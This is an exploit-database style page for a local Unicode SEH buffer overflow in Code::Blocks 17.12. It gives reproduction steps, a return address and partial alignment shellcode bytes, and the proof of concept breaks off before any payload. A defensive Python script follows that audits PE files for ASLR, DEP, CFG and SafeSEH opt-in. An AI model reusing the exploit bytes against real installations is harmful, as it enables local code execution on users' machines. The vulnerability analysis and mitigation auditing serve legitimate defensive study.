Code blocks 17.12 file name local buffer overflow (unicode) (seh) (poc) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2020-06-17 | Type: local | Platform: windows
This exploit / vulnerability, Code blocks 17.12 file name local buffer overflow (unicode) (seh) (poc), is for educational purposes only; if you use it, you do so at your own risk.
[+] Code ...
# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
# Steps to Reproduce the Crash:
# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Click on "Go" > Click on "Next"
# 7.- Paste clipboard content into the "Filename with fullpath:" field.
# 8.- Click on "Finish".
# 9.- Calc.exe runs.
#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh="\xe0\x50"
ven = "\x62" #align
ven += "\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align
ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret
junk2="\x41" * 108 #required to make sure shellcode = eax
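The PoC's header line reports that codeblocks.exe was built without SafeSEH or ASLR, and step 3 of the reproduction requires DEP to be switched off for the process; those three missing mitigations are what make a Unicode SEH overwrite in a fixed-address module practical at all. The following Python script is an added example, not part of the original PoC or of the Code::Blocks project: it reads the DllCharacteristics field of a PE file's optional header (the real IMAGE_DLLCHARACTERISTICS_* bits) and checks whether the load configuration directory exists, so a defender can audit an installed binary for compiler-level mitigations without running mona. The two sample images it builds are constructed, headers-only PE32 stubs used purely to exercise the parser; the file name on the command line is whatever executable you want to inspect.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_FLAGS = {
    "HIGH_ENTROPY_VA": 0x0020,
    "DYNAMIC_BASE": 0x0040,   # ASLR opt-in
    "FORCE_INTEGRITY": 0x0080,
    "NX_COMPAT": 0x0100,      # DEP opt-in
    "NO_SEH": 0x0400,         # image declares it uses no SEH handlers at all
    "GUARD_CF": 0x4000,       # Control Flow Guard
}
LOAD_CONFIG_DIR_INDEX = 10    # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
# Mitigations a defender would expect on a modern 32-bit desktop application.
EXPECTED = ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF")


def parse_pe_mitigations(data: bytes) -> dict:
    """Read the mitigation flags from the optional header of a PE image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                       # skip signature and 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                            # PE32
        dllchar_off, ndirs_off = 70, 92
    elif magic == 0x20B:                          # PE32+ (8-byte ImageBase, no BaseOfData)
        dllchar_off, ndirs_off = 74, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchar = struct.unpack_from("<H", data, opt + dllchar_off)[0]
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    dirs_off = opt + ndirs_off + 4
    load_config_size = 0
    if ndirs > LOAD_CONFIG_DIR_INDEX:
        _rva, load_config_size = struct.unpack_from(
            "<II", data, dirs_off + 8 * LOAD_CONFIG_DIR_INDEX)
    result = {name: bool(dllchar & bit) for name, bit in DLL_FLAGS.items()}
    # SafeSEH lives in the load config directory (SEHandlerTable/SEHandlerCount);
    # this only records whether that directory exists, which is a prerequisite.
    result["LOAD_CONFIG_PRESENT"] = load_config_size != 0
    result["PE32PLUS"] = magic == 0x20B
    return result


def missing_mitigations(data: bytes) -> list:
    """Return the names of expected mitigations the image does not opt into."""
    flags = parse_pe_mitigations(data)
    missing = [name for name in EXPECTED if not flags[name]]
    if not flags["PE32PLUS"] and not flags["LOAD_CONFIG_PRESENT"]:
        missing.append("SAFESEH")                 # 32-bit image with no load config at all
    return missing


def build_sample_pe32(dllchar: int, load_config_size: int = 0) -> bytes:
    """Constructed, headers-only PE32 image used only to exercise the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)         # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)  # i386, 224-byte opt header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, dllchar)
    struct.pack_into("<I", opt, 92, 16)           # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR_INDEX,
                     0x1000 if load_config_size else 0, load_config_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                         # audit a real file: python pe_mitigations.py app.exe
        with open(sys.argv[1], "rb") as fh:
            samples = {sys.argv[1]: fh.read()}
    else:                                         # constructed samples: legacy build vs hardened build
        samples = {
            "legacy-sample.exe": build_sample_pe32(0x0000),
            "hardened-sample.exe": build_sample_pe32(0x4140, load_config_size=64),
        }
    for name, image in samples.items():
        gaps = missing_mitigations(image)
        print("%-22s %s" % (name, "OK" if not gaps else "missing: " + ", ".join(gaps)))
```

Two caveats when reading the output. DllCharacteristics records what the image opts into, not what is enforced: the system DEP policy (OptIn, OptOut, AlwaysOn) and the loader decide the outcome for a given process, which is why the PoC's step 3 can change the result without touching the binary. And SafeSEH proper requires a non-empty SEHandlerTable in the load configuration directory; this script reports only whether that directory is present, so "SAFESEH" in its output means the image certainly lacks it, while its absence from the output is not proof that handlers are registered.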